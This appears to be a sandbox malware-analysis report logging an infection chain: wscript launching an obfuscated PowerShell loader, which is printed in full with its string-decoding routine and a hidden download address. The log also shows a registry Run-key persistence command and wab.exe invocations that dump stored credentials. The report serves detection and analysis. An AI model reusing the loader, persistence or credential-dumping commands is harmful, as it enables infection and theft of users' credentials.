              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.0000000008866000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 4e089\System.Core.pdb-)9 source: powershell.exe, 0000000F.00000002.1857571369.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offty", "0")
              Source: Yara matchFile source: 0000000F.00000002.1859111594.000000000C9DD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1858724524.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1850677246.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ernringstilstandens)$global:Idehistoriens = [System.Text.Encoding]::ASCII.GetString($Porridgy)$global:Fremfre=$Idehistoriens.substring(322359,29063)<#Nonlinearity Duplikerer Skattesp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Solduges $Superinjection $Ufornuftigheders), (Upspout @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Conducted = [AppDomain]::CurrentDomain.GetAssemblies(
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mobiliseringens)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Occidentalt, $false).DefineType($Manlikel
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ernringstilstandens)$global:Idehistoriens = [System.Text.Encoding]::ASCII.GetString($Porridgy)$global:Fremfre=$Idehistoriens.substring(322359,29063)<#Nonlinearity Duplikerer Skattesp
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra 